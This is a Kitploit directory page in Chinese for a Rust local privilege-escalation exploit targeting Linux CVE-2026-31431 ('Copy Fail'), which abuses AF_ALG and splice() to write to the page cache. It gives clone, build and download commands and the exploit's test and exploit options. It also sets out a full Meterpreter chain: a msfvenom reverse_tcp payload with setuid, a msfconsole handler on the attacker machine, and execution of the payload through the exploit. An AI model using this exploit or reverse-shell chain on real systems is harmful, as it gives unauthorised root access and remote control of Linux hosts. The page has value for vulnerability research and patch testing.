Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-31431-Linux-Copy-Fail — 基于 Rust 编写的本地权限提升漏洞利用程序,针对 CVE-2026-31431,可在 Linux 系统上执行自定义 shellcode(如 Meterpreter)。 | Kitploit
工具/GitHubGitHub/iss4cf0ng/cve-2026-31431-linux-copy-fail
权限提升漏洞利用框架漏洞分析漏洞利用渗透测试Payload 开发二进制利用
GitHubiss4cf0ng/cve-2026-31431-linux-copy-fail

CVE-2026-31431-Linux-Copy-Fail

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

基于 Rust 编写的本地权限提升漏洞利用程序,针对 CVE-2026-31431,可在 Linux 系统上执行自定义 shellcode(如 Meterpreter)。

查看仓库网站
56213个月前Kitploit 审核通过

CVE-2026-31431 - Linux Copy-Fail 漏洞利用(Rust)

一个针对 CVE-2026-31431(Copy-Fail)的本地权限提升漏洞利用的 Rust 实现。

它允许执行自定义 shellcode(例如 Meterpreter)

简介

Xint 披露了 CVE-2026-31431,这是一个任意页缓存写入漏洞,通过链式利用 AF_ALG 和 splice() 实现 4 字节写入原语。

来源:Copy Fail: 732 Bytes to Root on Every Major Linux Distribution

免责声明

本项目是出于我个人对网络安全学习的兴趣而开发的。然而,它有可能被恶意滥用。

请勿将此工具用于任何非法活动。

作者对任何滥用本软件的行为概不负责。

致谢

  • theori-io/copy-fail-CVE-2026-31431

注意:原始作品使用压缩/编码的 shellcode(例如 /bin/sh)。在本实现中,我将其替换为原始(未压缩)的 /bin/bash shellcode,使其更易于自定义或直接替换为用户提供的载荷。

如何编译

克隆项目,然后执行 build.sh:

root@kitploit:~
git clone [email protected]:iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail
cd ./CVE-2026-31431-Linux-Copy-Fail
chmod +x ./build.sh
./build.sh

使用方法

下载并解压发布包:

root@kitploit:~
wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz
tar -xzf CVE-2026-31431-Linux-Fail.gz
chmod +x CVE-2026-31431-Linux-Copy-Fail_x64
chmod +x CVE-2026-31431-Linux-Copy-Fail_x86

二进制文件提供以下选项:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin

演示

测试漏洞

在存在漏洞的机器上:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --test

漏洞利用

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --exploit

Meterpreter

使用以下命令(将 PrependSetUid 设置为 True)生成 Meterpreter 载荷:

root@kitploit:~
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin

在攻击机(Kali Linux)上:

root@kitploit:~
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.x
set lport 4444
run

在存在漏洞的机器上:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin

受影响版本

  • Ubuntu
  • Redhat
下载工具